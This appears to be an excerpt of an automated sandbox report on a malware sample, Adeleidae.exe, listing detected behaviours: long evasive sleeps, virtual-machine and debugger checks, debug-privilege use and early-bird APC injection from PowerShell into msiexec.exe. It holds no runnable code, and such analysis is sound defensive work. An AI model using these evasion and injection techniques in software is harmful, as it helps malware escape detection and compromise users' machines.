Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599867 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599745 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599640 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599531 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599421 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599312 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599202 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599093 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598984 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598874 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598765 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598656 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598544 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598437 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598328 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598218 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598109 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597999 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597890 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597781 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597671 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597562 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597453 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597343 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597234 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597124 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597015 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596906 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596792 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596687 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596577 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596468 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596359 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596250 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596140 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596031 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595921 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595812 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595703 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595593 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595484 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595375 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595265 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595156 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595046 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594937 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594828 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594718 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594609 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6893 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2882 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7548 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -27670116110564310s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -599867s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4008 Thread sleep count: 1258 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4008 Thread sleep count: 8603 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -599745s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -599640s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -599531s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -599421s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -599312s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -599202s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -599093s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -598984s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -598874s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -598765s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -598656s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -598544s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -598437s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -598328s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -598218s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -598109s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -597999s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -597890s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -597781s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -597671s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -597562s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -597453s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -597343s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -597234s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -597124s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -597015s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -596906s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -596792s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -596687s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -596577s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -596468s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -596359s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -596250s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -596140s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -596031s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -595921s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -595812s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -595703s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -595593s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -595484s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -595375s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -595265s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -595156s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -595046s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -594937s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -594828s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -594718s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -594609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405846
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_00406398 FindFirstFileW,FindClose, 0_2_00406398
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_004027FB FindFirstFileW, 0_2_004027FB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599867 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599745 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599640 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599531 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599421 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599312 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599202 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599093 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598984 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598874 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598765 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598656 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598544 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598437 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598328 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598218 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598109 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597999 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597890 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597781 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597671 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597562 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597453 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597343 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597234 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597124 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597015 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596906 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596792 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596687 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596577 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596468 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596359 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596250 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596140 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596031 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595921 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595812 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595703 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595593 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595484 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595375 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595265 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595156 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595046 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594937 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594828 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594718 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594609 Jump to behavior
Source: Adeleidae.exe, 00000000.00000002.1814352755.0000000000758000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E4A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3009741267.0000000009EA8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Adeleidae.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Adeleidae.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_047FF288 LdrInitializeThunk,LdrInitializeThunk, 1_2_047FF288
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Early bird code injection technique detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3CF0000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
